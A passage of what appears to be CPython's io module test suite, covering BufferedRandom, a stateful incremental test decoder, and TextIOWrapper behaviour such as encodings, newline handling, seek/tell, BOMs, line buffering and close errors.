self.assertEqual(raw.getvalue(), b'1b\n2def\n3\n') # You can't construct a BufferedRandom over a non-seekable stream. test_unseekable = None # writable() returns True, so there's no point to test it over # a writable stream. test_truncate_on_read_only = None class CBufferedRandomTest(BufferedRandomTest, SizeofTest): tp = io.BufferedRandom @unittest.skipIf(MEMORY_SANITIZER, "MSan defaults to crashing " "instead of returning NULL for malloc failure.") def test_constructor(self): BufferedRandomTest.test_constructor(self) # The allocation can succeed on 32-bit builds, e.g. with more # than 2 GiB RAM and a 64-bit kernel. if sys.maxsize > 0x7FFFFFFF: rawio = self.MockRawIO() bufio = self.tp(rawio) self.assertRaises((OverflowError, MemoryError, ValueError), bufio.__init__, rawio, sys.maxsize) def test_garbage_collection(self): CBufferedReaderTest.test_garbage_collection(self) CBufferedWriterTest.test_garbage_collection(self) def test_args_error(self): # Issue #17275 with self.assertRaisesRegex(TypeError, "BufferedRandom"): self.tp(io.BytesIO(), 1024, 1024, 1024) class PyBufferedRandomTest(BufferedRandomTest): tp = pyio.BufferedRandom # To fully exercise seek/tell, the StatefulIncrementalDecoder has these # properties: # - A single output character can correspond to many bytes of input. # - The number of input bytes to complete the character can be # undetermined until the last input byte is received. # - The number of input bytes can vary depending on previous input. # - A single input byte can correspond to many characters of output. # - The number of output characters can be undetermined until the # last input byte is received. # - The number of output characters can vary depending on previous input. class StatefulIncrementalDecoder(codecs.IncrementalDecoder): """ For testing seek/tell behavior with a stateful, buffering decoder. Input is a sequence of words. Words may be fixed-length (length set by input) or variable-length (period-terminated). In variable-length mode, extra periods are ignored. Possible words are: - 'i' followed by a number sets the input length, I (maximum 99). When I is set to 0, words are space-terminated. - 'o' followed by a number sets the output length, O (maximum 99). - Any other word is converted into a word followed by a period on the output. The output word consists of the input word truncated or padded out with hyphens to make its length equal to O. If O is 0, the word is output verbatim without truncating or padding. I and O are initially set to 1. When I changes, any buffered input is re-scanned according to the new I. EOF also terminates the last word. """ def __init__(self, errors='strict'): codecs.IncrementalDecoder.__init__(self, errors) self.reset() def __repr__(self): return '<SID %x>' % id(self) def reset(self): self.i = 1 self.o = 1 self.buffer = bytearray() def getstate(self): i, o = self.i ^ 1, self.o ^ 1 # so that flags = 0 after reset() return bytes(self.buffer), i*100 + o def setstate(self, state): buffer, io = state self.buffer = bytearray(buffer) i, o = divmod(io, 100) self.i, self.o = i ^ 1, o ^ 1 def decode(self, input, final=False): output = '' for b in input: if self.i == 0: # variable-length, terminated with period if b == ord('.'): if self.buffer: output += self.process_word() else: self.buffer.append(b) else: # fixed-length, terminate after self.i bytes self.buffer.append(b) if len(self.buffer) == self.i: output += self.process_word() if final and self.buffer: # EOF terminates the last word output += self.process_word() return output def process_word(self): output = '' if self.buffer[0] == ord('i'): self.i = min(99, int(self.buffer[1:] or 0)) # set input length elif self.buffer[0] == ord('o'): self.o = min(99, int(self.buffer[1:] or 0)) # set output length else: output = self.buffer.decode('ascii') if len(output) < self.o: output += '-'*self.o # pad out with hyphens if self.o: output = output[:self.o] # truncate to output length output += '.' self.buffer = bytearray() return output codecEnabled = False # bpo-41919: This method is separated from StatefulIncrementalDecoder to avoid a resource leak # when registering codecs and cleanup functions. def lookupTestDecoder(name): if StatefulIncrementalDecoder.codecEnabled and name == 'test_decoder': latin1 = codecs.lookup('latin-1') return codecs.CodecInfo( name='test_decoder', encode=latin1.encode, decode=None, incrementalencoder=None, streamreader=None, streamwriter=None, incrementaldecoder=StatefulIncrementalDecoder) class StatefulIncrementalDecoderTest(unittest.TestCase): """ Make sure the StatefulIncrementalDecoder actually works. """ test_cases = [ # I=1, O=1 (fixed-length input == fixed-length output) (b'abcd', False, 'a.b.c.d.'), # I=0, O=0 (variable-length input, variable-length output) (b'oiabcd', True, 'abcd.'), # I=0, O=0 (should ignore extra periods) (b'oi...abcd...', True, 'abcd.'), # I=0, O=6 (variable-length input, fixed-length output) (b'i.o6.x.xyz.toolongtofit.', False, 'x-----.xyz---.toolon.'), # I=2, O=6 (fixed-length input < fixed-length output) (b'i.i2.o6xyz', True, 'xy----.z-----.'), # I=6, O=3 (fixed-length input > fixed-length output) (b'i.o3.i6.abcdefghijklmnop', True, 'abc.ghi.mno.'), # I=0, then 3; O=29, then 15 (with longer output) (b'i.o29.a.b.cde.o15.abcdefghijabcdefghij.i3.a.b.c.d.ei00k.l.m', True, 'a----------------------------.' + 'b----------------------------.' + 'cde--------------------------.' + 'abcdefghijabcde.' + 'a.b------------.' + '.c.------------.' + 'd.e------------.' + 'k--------------.' + 'l--------------.' + 'm--------------.') ] def test_decoder(self): # Try a few one-shot test cases. for input, eof, output in self.test_cases: d = StatefulIncrementalDecoder() self.assertEqual(d.decode(input, eof), output) # Also test an unfinished decode, followed by forcing EOF. d = StatefulIncrementalDecoder() self.assertEqual(d.decode(b'oiabcd'), '') self.assertEqual(d.decode(b'', 1), 'abcd.') class TextIOWrapperTest(unittest.TestCase): def setUp(self): self.testdata = b"AAA\r\nBBB\rCCC\r\nDDD\nEEE\r\n" self.normalized = b"AAA\nBBB\nCCC\nDDD\nEEE\n".decode("ascii") os_helper.unlink(os_helper.TESTFN) codecs.register(lookupTestDecoder) self.addCleanup(codecs.unregister, lookupTestDecoder) def tearDown(self): os_helper.unlink(os_helper.TESTFN) def test_constructor(self): r = self.BytesIO(b"\xc3\xa9\n\n") b = self.BufferedReader(r, 1000) t = self.TextIOWrapper(b) t.__init__(b, encoding="latin-1", newline="\r\n") self.assertEqual(t.encoding, "latin-1") self.assertEqual(t.line_buffering, False) t.__init__(b, encoding="utf-8", line_buffering=True) self.assertEqual(t.encoding, "utf-8") self.assertEqual(t.line_buffering, True) self.assertEqual("\xe9\n", t.readline()) self.assertRaises(TypeError, t.__init__, b, newline=42) self.assertRaises(ValueError, t.__init__, b, newline='xyzzy') def test_uninitialized(self): t = self.TextIOWrapper.__new__(self.TextIOWrapper) del t t = self.TextIOWrapper.__new__(self.TextIOWrapper) self.assertRaises(Exception, repr, t) self.assertRaisesRegex((ValueError, AttributeError), 'uninitialized|has no attribute', t.read, 0) t.__init__(self.MockRawIO()) self.assertEqual(t.read(0), '') def test_non_text_encoding_codecs_are_rejected(self): # Ensure the constructor complains if passed a codec that isn't # marked as a text encoding # http://bugs.python.org/issue20404 r = self.BytesIO() b = self.BufferedWriter(r) with self.assertRaisesRegex(LookupError, "is not a text encoding"): self.TextIOWrapper(b, encoding="hex") def test_detach(self): r = self.BytesIO() b = self.BufferedWriter(r) t = self.TextIOWrapper(b) self.assertIs(t.detach(), b) t = self.TextIOWrapper(b, encoding="ascii") t.write("howdy") self.assertFalse(r.getvalue()) t.detach() self.assertEqual(r.getvalue(), b"howdy") self.assertRaises(ValueError, t.detach) # Operations independent of the detached stream should still work repr(t) self.assertEqual(t.encoding, "ascii") self.assertEqual(t.errors, "strict") self.assertFalse(t.line_buffering) self.assertFalse(t.write_through) def test_repr(self): raw = self.BytesIO("hello".encode("utf-8")) b = self.BufferedReader(raw) t = self.TextIOWrapper(b, encoding="utf-8") modname = self.TextIOWrapper.__module__ self.assertRegex(repr(t), r"<(%s\.)?TextIOWrapper encoding='utf-8'>" % modname) raw.name = "dummy" self.assertRegex(repr(t), r"<(%s\.)?TextIOWrapper name='dummy' encoding='utf-8'>" % modname) t.mode = "r" self.assertRegex(repr(t), r"<(%s\.)?TextIOWrapper name='dummy' mode='r' encoding='utf-8'>" % modname) raw.name = b"dummy" self.assertRegex(repr(t), r"<(%s\.)?TextIOWrapper name=b'dummy' mode='r' encoding='utf-8'>" % modname) t.buffer.detach() repr(t) # Should not raise an exception def test_recursive_repr(self): # Issue #25455 raw = self.BytesIO() t = self.TextIOWrapper(raw) with support.swap_attr(raw, 'name', t): try: repr(t) # Should not crash except RuntimeError: pass def test_line_buffering(self): r = self.BytesIO() b = self.BufferedWriter(r, 1000) t = self.TextIOWrapper(b, newline="\n", line_buffering=True) t.write("X") self.assertEqual(r.getvalue(), b"") # No flush happened t.write("Y\nZ") self.assertEqual(r.getvalue(), b"XY\nZ") # All got flushed t.write("A\rB") self.assertEqual(r.getvalue(), b"XY\nZA\rB") def test_reconfigure_line_buffering(self): r = self.BytesIO() b = self.BufferedWriter(r, 1000) t = self.TextIOWrapper(b, newline="\n", line_buffering=False) t.write("AB\nC") self.assertEqual(r.getvalue(), b"") t.reconfigure(line_buffering=True) # implicit flush self.assertEqual(r.getvalue(), b"AB\nC") t.write("DEF\nG") self.assertEqual(r.getvalue(), b"AB\nCDEF\nG") t.write("H") self.assertEqual(r.getvalue(), b"AB\nCDEF\nG") t.reconfigure(line_buffering=False) # implicit flush self.assertEqual(r.getvalue(), b"AB\nCDEF\nGH") t.write("IJ") self.assertEqual(r.getvalue(), b"AB\nCDEF\nGH") # Keeping default value t.reconfigure() t.reconfigure(line_buffering=None) self.assertEqual(t.line_buffering, False) t.reconfigure(line_buffering=True) t.reconfigure() t.reconfigure(line_buffering=None) self.assertEqual(t.line_buffering, True) @unittest.skipIf(sys.flags.utf8_mode, "utf-8 mode is enabled") def test_default_encoding(self): old_environ = dict(os.environ) try: # try to get a user preferred encoding different than the current # locale encoding to check that TextIOWrapper() uses the current # locale encoding and not the user preferred encoding for key in ('LC_ALL', 'LANG', 'LC_CTYPE'): if key in os.environ: del os.environ[key] current_locale_encoding = locale.getpreferredencoding(False) b = self.BytesIO() t = self.TextIOWrapper(b) self.assertEqual(t.encoding, current_locale_encoding) finally: os.environ.clear() os.environ.update(old_environ) @support.cpython_only @unittest.skipIf(sys.flags.utf8_mode, "utf-8 mode is enabled") def test_device_encoding(self): # Issue 15989 import _testcapi b = self.BytesIO() b.fileno = lambda: _testcapi.INT_MAX + 1 self.assertRaises(OverflowError, self.TextIOWrapper, b) b.fileno = lambda: _testcapi.UINT_MAX + 1 self.assertRaises(OverflowError, self.TextIOWrapper, b) def test_encoding(self): # Check the encoding attribute is always set, and valid b = self.BytesIO() t = self.TextIOWrapper(b, encoding="utf-8") self.assertEqual(t.encoding, "utf-8") t = self.TextIOWrapper(b) self.assertIsNotNone(t.encoding) codecs.lookup(t.encoding) def test_encoding_errors_reading(self): # (1) default b = self.BytesIO(b"abc\n\xff\n") t = self.TextIOWrapper(b, encoding="ascii") self.assertRaises(UnicodeError, t.read) # (2) explicit strict b = self.BytesIO(b"abc\n\xff\n") t = self.TextIOWrapper(b, encoding="ascii", errors="strict") self.assertRaises(UnicodeError, t.read) # (3) ignore b = self.BytesIO(b"abc\n\xff\n") t = self.TextIOWrapper(b, encoding="ascii", errors="ignore") self.assertEqual(t.read(), "abc\n\n") # (4) replace b = self.BytesIO(b"abc\n\xff\n") t = self.TextIOWrapper(b, encoding="ascii", errors="replace") self.assertEqual(t.read(), "abc\n\ufffd\n") def test_encoding_errors_writing(self): # (1) default b = self.BytesIO() t = self.TextIOWrapper(b, encoding="ascii") self.assertRaises(UnicodeError, t.write, "\xff") # (2) explicit strict b = self.BytesIO() t = self.TextIOWrapper(b, encoding="ascii", errors="strict") self.assertRaises(UnicodeError, t.write, "\xff") # (3) ignore b = self.BytesIO() t = self.TextIOWrapper(b, encoding="ascii", errors="ignore", newline="\n") t.write("abc\xffdef\n") t.flush() self.assertEqual(b.getvalue(), b"abcdef\n") # (4) replace b = self.BytesIO() t = self.TextIOWrapper(b, encoding="ascii", errors="replace", newline="\n") t.write("abc\xffdef\n") t.flush() self.assertEqual(b.getvalue(), b"abc?def\n") def test_newlines(self): input_lines = [ "unix\n", "windows\r\n", "os9\r", "last\n", "nonl" ] tests = [ [ None, [ 'unix\n', 'windows\n', 'os9\n', 'last\n', 'nonl' ] ], [ '', input_lines ], [ '\n', [ "unix\n", "windows\r\n", "os9\rlast\n", "nonl" ] ], [ '\r\n', [ "unix\nwindows\r\n", "os9\rlast\nnonl" ] ], [ '\r', [ "unix\nwindows\r", "\nos9\r", "last\nnonl" ] ], ] encodings = ( 'utf-8', 'latin-1', 'utf-16', 'utf-16-le', 'utf-16-be', 'utf-32', 'utf-32-le', 'utf-32-be', ) # Try a range of buffer sizes to test the case where \r is the last # character in TextIOWrapper._pending_line. for encoding in encodings: # XXX: str.encode() should return bytes data = bytes(''.join(input_lines).encode(encoding)) for do_reads in (False, True): for bufsize in range(1, 10): for newline, exp_lines in tests: bufio = self.BufferedReader(self.BytesIO(data), bufsize) textio = self.TextIOWrapper(bufio, newline=newline, encoding=encoding) if do_reads: got_lines = [] while True: c2 = textio.read(2) if c2 == '': break self.assertEqual(len(c2), 2) got_lines.append(c2 + textio.readline()) else: got_lines = list(textio) for got_line, exp_line in zip(got_lines, exp_lines): self.assertEqual(got_line, exp_line) self.assertEqual(len(got_lines), len(exp_lines)) def test_newlines_input(self): testdata = b"AAA\nBB\x00B\nCCC\rDDD\rEEE\r\nFFF\r\nGGG" normalized = testdata.replace(b"\r\n", b"\n").replace(b"\r", b"\n") for newline, expected in [ (None, normalized.decode("ascii").splitlines(keepends=True)), ("", testdata.decode("ascii").splitlines(keepends=True)), ("\n", ["AAA\n", "BB\x00B\n", "CCC\rDDD\rEEE\r\n", "FFF\r\n", "GGG"]), ("\r\n", ["AAA\nBB\x00B\nCCC\rDDD\rEEE\r\n", "FFF\r\n", "GGG"]), ("\r", ["AAA\nBB\x00B\nCCC\r", "DDD\r", "EEE\r", "\nFFF\r", "\nGGG"]), ]: buf = self.BytesIO(testdata) txt = self.TextIOWrapper(buf, encoding="ascii", newline=newline) self.assertEqual(txt.readlines(), expected) txt.seek(0) self.assertEqual(txt.read(), "".join(expected)) def test_newlines_output(self): testdict = { "": b"AAA\nBBB\nCCC\nX\rY\r\nZ", "\n": b"AAA\nBBB\nCCC\nX\rY\r\nZ", "\r": b"AAA\rBBB\rCCC\rX\rY\r\rZ", "\r\n": b"AAA\r\nBBB\r\nCCC\r\nX\rY\r\r\nZ", } tests = [(None, testdict[os.linesep])] + sorted(testdict.items()) for newline, expected in tests: buf = self.BytesIO() txt = self.TextIOWrapper(buf, encoding="ascii", newline=newline) txt.write("AAA\nB") txt.write("BB\nCCC\n") txt.write("X\rY\r\nZ") txt.flush() self.assertEqual(buf.closed, False) self.assertEqual(buf.getvalue(), expected) def test_destructor(self): l = [] base = self.BytesIO class MyBytesIO(base): def close(self): l.append(self.getvalue()) base.close(self) b = MyBytesIO() t = self.TextIOWrapper(b, encoding="ascii") t.write("abc") del t support.gc_collect() self.assertEqual([b"abc"], l) def test_override_destructor(self): record = [] class MyTextIO(self.TextIOWrapper): def __del__(self): record.append(1) try: f = super().__del__ except AttributeError: pass else: f() def close(self): record.append(2) super().close() def flush(self): record.append(3) super().flush() b = self.BytesIO() t = MyTextIO(b, encoding="ascii") del t support.gc_collect() self.assertEqual(record, [1, 2, 3]) def test_error_through_destructor(self): # Test that the exception state is not modified by a destructor, # even if close() fails. rawio = self.CloseFailureIO() with support.catch_unraisable_exception() as cm: with self.assertRaises(AttributeError): self.TextIOWrapper(rawio).xyzzy if not IOBASE_EMITS_UNRAISABLE: self.assertIsNone(cm.unraisable) elif cm.unraisable is not None: self.assertEqual(cm.unraisable.exc_type, OSError) # Systematic tests of the text I/O API def test_basic_io(self): for chunksize in (1, 2, 3, 4, 5, 15, 16, 17, 31, 32, 33, 63, 64, 65): for enc in "ascii", "latin-1", "utf-8" :# , "utf-16-be", "utf-16-le": f = self.open(os_helper.TESTFN, "w+", encoding=enc) f._CHUNK_SIZE = chunksize self.assertEqual(f.write("abc"), 3) f.close() f = self.open(os_helper.TESTFN, "r+", encoding=enc) f._CHUNK_SIZE = chunksize self.assertEqual(f.tell(), 0) self.assertEqual(f.read(), "abc") cookie = f.tell() self.assertEqual(f.seek(0), 0) self.assertEqual(f.read(None), "abc") f.seek(0) self.assertEqual(f.read(2), "ab") self.assertEqual(f.read(1), "c") self.assertEqual(f.read(1), "") self.assertEqual(f.read(), "") self.assertEqual(f.tell(), cookie) self.assertEqual(f.seek(0), 0) self.assertEqual(f.seek(0, 2), cookie) self.assertEqual(f.write("def"), 3) self.assertEqual(f.seek(cookie), cookie) self.assertEqual(f.read(), "def") if enc.startswith("utf"): self.multi_line_test(f, enc) f.close() def multi_line_test(self, f, enc): f.seek(0) f.truncate() sample = "s\xff\u0fff\uffff" wlines = [] for size in (0, 1, 2, 3, 4, 5, 30, 31, 32, 33, 62, 63, 64, 65, 1000): chars = [] for i in range(size): chars.append(sample[i % len(sample)]) line = "".join(chars) + "\n" wlines.append((f.tell(), line)) f.write(line) f.seek(0) rlines = [] while True: pos = f.tell() line = f.readline() if not line: break rlines.append((pos, line)) self.assertEqual(rlines, wlines) def test_telling(self): f = self.open(os_helper.TESTFN, "w+", encoding="utf-8") p0 = f.tell() f.write("\xff\n") p1 = f.tell() f.write("\xff\n") p2 = f.tell() f.seek(0) self.assertEqual(f.tell(), p0) self.assertEqual(f.readline(), "\xff\n") self.assertEqual(f.tell(), p1) self.assertEqual(f.readline(), "\xff\n") self.assertEqual(f.tell(), p2) f.seek(0) for line in f: self.assertEqual(line, "\xff\n") self.assertRaises(OSError, f.tell) self.assertEqual(f.tell(), p2) f.close() def test_seeking(self): chunk_size = _default_chunk_size() prefix_size = chunk_size - 2 u_prefix = "a" * prefix_size prefix = bytes(u_prefix.encode("utf-8")) self.assertEqual(len(u_prefix), len(prefix)) u_suffix = "\u8888\n" suffix = bytes(u_suffix.encode("utf-8")) line = prefix + suffix with self.open(os_helper.TESTFN, "wb") as f: f.write(line*2) with self.open(os_helper.TESTFN, "r", encoding="utf-8") as f: s = f.read(prefix_size) self.assertEqual(s, str(prefix, "ascii")) self.assertEqual(f.tell(), prefix_size) self.assertEqual(f.readline(), u_suffix) def test_seeking_too(self): # Regression test for a specific bug data = b'\xe0\xbf\xbf\n' with self.open(os_helper.TESTFN, "wb") as f: f.write(data) with self.open(os_helper.TESTFN, "r", encoding="utf-8") as f: f._CHUNK_SIZE # Just test that it exists f._CHUNK_SIZE = 2 f.readline() f.tell() def test_seek_and_tell(self): #Test seek/tell using the StatefulIncrementalDecoder. # Make test faster by doing smaller seeks CHUNK_SIZE = 128 def test_seek_and_tell_with_data(data, min_pos=0): """Tell/seek to various points within a data stream and ensure that the decoded data returned by read() is consistent.""" f = self.open(os_helper.TESTFN, 'wb') f.write(data) f.close() f = self.open(os_helper.TESTFN, encoding='test_decoder') f._CHUNK_SIZE = CHUNK_SIZE decoded = f.read() f.close() for i in range(min_pos, len(decoded) + 1): # seek positions for j in [1, 5, len(decoded) - i]: # read lengths f = self.open(os_helper.TESTFN, encoding='test_decoder') self.assertEqual(f.read(i), decoded[:i]) cookie = f.tell() self.assertEqual(f.read(j), decoded[i:i + j]) f.seek(cookie) self.assertEqual(f.read(), decoded[i:]) f.close() # Enable the test decoder. StatefulIncrementalDecoder.codecEnabled = 1 # Run the tests. try: # Try each test case. for input, _, _ in StatefulIncrementalDecoderTest.test_cases: test_seek_and_tell_with_data(input) # Position each test case so that it crosses a chunk boundary. for input, _, _ in StatefulIncrementalDecoderTest.test_cases: offset = CHUNK_SIZE - len(input)//2 prefix = b'.'*offset # Don't bother seeking into the prefix (takes too long). min_pos = offset*2 test_seek_and_tell_with_data(prefix + input, min_pos) # Ensure our test decoder won't interfere with subsequent tests. finally: StatefulIncrementalDecoder.codecEnabled = 0 def test_multibyte_seek_and_tell(self): f = self.open(os_helper.TESTFN, "w", encoding="euc_jp") f.write("AB\n\u3046\u3048\n") f.close() f = self.open(os_helper.TESTFN, "r", encoding="euc_jp") self.assertEqual(f.readline(), "AB\n") p0 = f.tell() self.assertEqual(f.readline(), "\u3046\u3048\n") p1 = f.tell() f.seek(p0) self.assertEqual(f.readline(), "\u3046\u3048\n") self.assertEqual(f.tell(), p1) f.close() def test_seek_with_encoder_state(self): f = self.open(os_helper.TESTFN, "w", encoding="euc_jis_2004") f.write("\u00e6\u0300") p0 = f.tell() f.write("\u00e6") f.seek(p0) f.write("\u0300") f.close() f = self.open(os_helper.TESTFN, "r", encoding="euc_jis_2004") self.assertEqual(f.readline(), "\u00e6\u0300\u0300") f.close() def test_encoded_writes(self): data = "1234567890" tests = ("utf-16", "utf-16-le", "utf-16-be", "utf-32", "utf-32-le", "utf-32-be") for encoding in tests: buf = self.BytesIO() f = self.TextIOWrapper(buf, encoding=encoding) # Check if the BOM is written only once (see issue1753). f.write(data) f.write(data) f.seek(0) self.assertEqual(f.read(), data * 2) f.seek(0) self.assertEqual(f.read(), data * 2) self.assertEqual(buf.getvalue(), (data * 2).encode(encoding)) def test_unreadable(self): class UnReadable(self.BytesIO): def readable(self): return False txt = self.TextIOWrapper(UnReadable()) self.assertRaises(OSError, txt.read) def test_read_one_by_one(self): txt = self.TextIOWrapper(self.BytesIO(b"AA\r\nBB")) reads = "" while True: c = txt.read(1) if not c: break reads += c self.assertEqual(reads, "AA\nBB") def test_readlines(self): txt = self.TextIOWrapper(self.BytesIO(b"AA\nBB\nCC")) self.assertEqual(txt.readlines(), ["AA\n", "BB\n", "CC"]) txt.seek(0) self.assertEqual(txt.readlines(None), ["AA\n", "BB\n", "CC"]) txt.seek(0) self.assertEqual(txt.readlines(5), ["AA\n", "BB\n"]) # read in amounts equal to TextIOWrapper._CHUNK_SIZE which is 128. def test_read_by_chunk(self): # make sure "\r\n" straddles 128 char boundary. txt = self.TextIOWrapper(self.BytesIO(b"A" * 127 + b"\r\nB")) reads = "" while True: c = txt.read(128) if not c: break reads += c self.assertEqual(reads, "A"*127+"\nB") def test_writelines(self): l = ['ab', 'cd', 'ef'] buf = self.BytesIO() txt = self.TextIOWrapper(buf) txt.writelines(l) txt.flush() self.assertEqual(buf.getvalue(), b'abcdef') def test_writelines_userlist(self): l = UserList(['ab', 'cd', 'ef']) buf = self.BytesIO() txt = self.TextIOWrapper(buf) txt.writelines(l) txt.flush() self.assertEqual(buf.getvalue(), b'abcdef') def test_writelines_error(self): txt = self.TextIOWrapper(self.BytesIO()) self.assertRaises(TypeError, txt.writelines, [1, 2, 3]) self.assertRaises(TypeError, txt.writelines, None) self.assertRaises(TypeError, txt.writelines, b'abc') def test_issue1395_1(self): txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii") # read one char at a time reads = "" while True: c = txt.read(1) if not c: break reads += c self.assertEqual(reads, self.normalized) def test_issue1395_2(self): txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii") txt._CHUNK_SIZE = 4 reads = "" while True: c = txt.read(4) if not c: break reads += c self.assertEqual(reads, self.normalized) def test_issue1395_3(self): txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii") txt._CHUNK_SIZE = 4 reads = txt.read(4) reads += txt.read(4) reads += txt.readline() reads += txt.readline() reads += txt.readline() self.assertEqual(reads, self.normalized) def test_issue1395_4(self): txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii") txt._CHUNK_SIZE = 4 reads = txt.read(4) reads += txt.read() self.assertEqual(reads, self.normalized) def test_issue1395_5(self): txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii") txt._CHUNK_SIZE = 4 reads = txt.read(4) pos = txt.tell() txt.seek(0) txt.seek(pos) self.assertEqual(txt.read(4), "BBB\n") def test_issue2282(self): buffer = self.BytesIO(self.testdata) txt = self.TextIOWrapper(buffer, encoding="ascii") self.assertEqual(buffer.seekable(), txt.seekable()) def test_append_bom(self): # The BOM is not written again when appending to a non-empty file filename = os_helper.TESTFN for charset in ('utf-8-sig', 'utf-16', 'utf-32'): with self.open(filename, 'w', encoding=charset) as f: f.write('aaa') pos = f.tell() with self.open(filename, 'rb') as f: self.assertEqual(f.read(), 'aaa'.encode(charset)) with self.open(filename, 'a', encoding=charset) as f: f.write('xxx') with self.open(filename, 'rb') as f: self.assertEqual(f.read(), 'aaaxxx'.encode(charset)) def test_seek_bom(self): # Same test, but when seeking manually filename = os_helper.TESTFN for charset in ('utf-8-sig', 'utf-16', 'utf-32'): with self.open(filename, 'w', encoding=charset) as f: f.write('aaa') pos = f.tell() with self.open(filename, 'r+', encoding=charset) as f: f.seek(pos) f.write('zzz') f.seek(0) f.write('bbb') with self.open(filename, 'rb') as f: self.assertEqual(f.read(), 'bbbzzz'.encode(charset)) def test_seek_append_bom(self): # Same test, but first seek to the start and then to the end filename = os_helper.TESTFN for charset in ('utf-8-sig', 'utf-16', 'utf-32'): with self.open(filename, 'w', encoding=charset) as f: f.write('aaa') with self.open(filename, 'a', encoding=charset) as f: f.seek(0) f.seek(0, self.SEEK_END) f.write('xxx') with self.open(filename, 'rb') as f: self.assertEqual(f.read(), 'aaaxxx'.encode(charset)) def test_errors_property(self): with self.open(os_helper.TESTFN, "w") as f: self.assertEqual(f.errors, "strict") with self.open(os_helper.TESTFN, "w", errors="replace") as f: self.assertEqual(f.errors, "replace") @support.no_tracing def test_threads_write(self): # Issue6750: concurrent writes could duplicate data event = threading.Event() with self.open(os_helper.TESTFN, "w", buffering=1) as f: def run(n): text = "Thread%03d\n" % n event.wait() f.write(text) threads = [threading.Thread(target=run, args=(x,)) for x in range(20)] with threading_helper.start_threads(threads, event.set): time.sleep(0.02) with self.open(os_helper.TESTFN) as f: content = f.read() for n in range(20): self.assertEqual(content.count("Thread%03d\n" % n), 1) def test_flush_error_on_close(self): # Test that text file is closed despite failed flush # and that flush() is called before file closed. txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii") closed = [] def bad_flush(): closed[:] = [txt.closed, txt.buffer.closed] raise OSError() txt.flush = bad_flush self.assertRaises(OSError, txt.close) # exception not swallowed self.assertTrue(txt.closed) self.assertTrue(txt.buffer.closed) self.assertTrue(closed) # flush() called self.assertFalse(closed[0]) # flush() called before file closed self.assertFalse(closed[1]) txt.flush = lambda: None # break reference loop def test_close_error_on_close(self): buffer = self.BytesIO(self.testdata) def bad_flush(): raise OSError('flush') def bad_close(): raise OSError('close') buffer.close = bad_close txt = self.TextIOWrapper(buffer, encoding="ascii") txt.flush = bad_flush with self.assertRaises(OSError) as err: # exception not swallowed txt.close() self.assertEqual(err.exception.args, ('close',)) self.assertIsInstance(err.exception.__context__, OSError) self.assertEqual(err.exception.__context__.args, ('flush',)) self.assertFalse(txt.closed) # Silence destructor error buffer.close = lambda: None txt.flush = lambda: None def test_nonnormalized_close_error_on_close(self): # Issue #21677 buffer = self.BytesIO(self.testdata) def bad_flush(): raise non_existing_flush def bad_close(): raise non_existing_close buffer.close = bad_close txt = self.TextIOWrapper(buffer, encoding="ascii") txt.flush = bad_flush with self.assertRaises(NameError) as err: # exception not swallowed txt.close() self.assertIn('non_existing_close', str(err.exception)) self.assertIsInstance(err.exception.__context__, NameError) self.assertIn('non_existing_flush', str(err.exception.__context__)) self.assertFalse(txt.closed) # Silence destructor error buffer.close = lambda: None txt.flush = lambda: None def test_multi_close(self): txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii") txt.close() txt.close() txt.close() self.assertRaises(ValueError, txt.flush) def test_unseekable(self): txt = self.TextIOWrapper(self.MockUnseekableIO(self.testdata)) self.assertRaises(self.UnsupportedOperation, txt.tell) self.assertRaises(self.UnsupportedOperation, txt.seek, 0) def test_readonly_attributes(self): txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii") buf = self.BytesIO(self.testdata) with self.assertRaises(AttributeError): txt.buffer = buf def test_rawio(self): # Issue #12591: TextIOWrapper must work with raw I/O objects, so # that subprocess.Popen() can have the required unbuffered # semantics with universal_newlines=True. raw = self.MockRawIO([b'abc', b'def', b'ghi\njkl\nopq\n']) txt = self.TextIOWrapper(raw, encoding='ascii', newline='\n') # Reads self.assertEqual(txt.read(4), 'abcd') self.assertEqual(txt.readline(), 'efghi\n') self.assertEqual(list(txt), ['jkl\n', 'opq\n']) def test_rawio_write_through(self): # Issue #12591: with write_through=True, writes don't need a flush raw = self.MockRawIO([b'abc', b'def', b'ghi\njkl\nopq\n']) txt = self.TextIOWrapper(raw, encoding='ascii', newline='\n', write_through=True) txt.write('1') txt.write('23\n4') txt.write('5') self.assertEqual(b''.join(raw._write_stack), b'123\n45') def test_bufio_write_through(self): # Issue #21396: write_through=True doesn't force a flush() # on the underlying binary buffered object. flush_called, write_called = [], [] class BufferedWriter(self.BufferedWriter): def flush(self, *args, **kwargs): flush_called.append(True) return super().flush(*args, **kwargs) def write(self, *args, **kwargs): write_called.append(True) return super().write(*args, **kwargs) rawio = self.BytesIO() data = b"a" bufio = BufferedWriter(rawio, len(data)*2) textio = self.TextIOWrapper(bufio, encoding='ascii', write_through=True) # write to the buffered io but don't overflow the buffer text = data.decode('ascii') textio.write(text) # buffer.flush is not called with write_through=True self.assertFalse(flush_called) # buffer.write *is* called with write_through=True self.assertTrue(write_called) self.assertEqual(rawio.getvalue(), b"") # no flush write_called = [] # reset textio.write(text * 10) # total content is larger than bufio buffer self.assertTrue(write_called) self.assertEqual(rawio.getvalue(), data * 11) # all flushed def test_reconfigure_write_through(self): raw = self.MockRawIO([]) t = self.TextIOWrapper(raw, encoding='ascii', newline='\n') t.write('1') t.reconfigure(write_through=True) # implied flush self.assertEqual(t.write_through, True) self.assertEqual(b''.join(raw._write_stack), b'1') t.write('23') self.assertEqual(b''.join(raw._write_stack), b'123') t.reconfigure(write_through=False) self.assertEqual(t.write_through, False) t.write('45') t.flush() self.assertEqual(b''.join(raw._write_stack), b'12345') # Keeping default value t.reconfigure() t.reconfigure(write_through=None) self.assertEqual(t.write_through, False) t.reconfigure(write_through=True) t.reconfigure() t.reconfigure(write_through=None) self.assertEqual(t.write_through, True) def test_read_nonbytes(self): # Issue #17106 # Crash when underlying read() returns non-bytes t = self.TextIOWrapper(self.StringIO('a')) self.assertRaises(TypeError, t.read, 1) t = self.TextIOWrapper(self.StringIO('a')) self.assertRaises(TypeError, t.readline) t = self.TextIOWrapper(self.StringIO('a')) self.assertRaises(TypeError, t.read) def 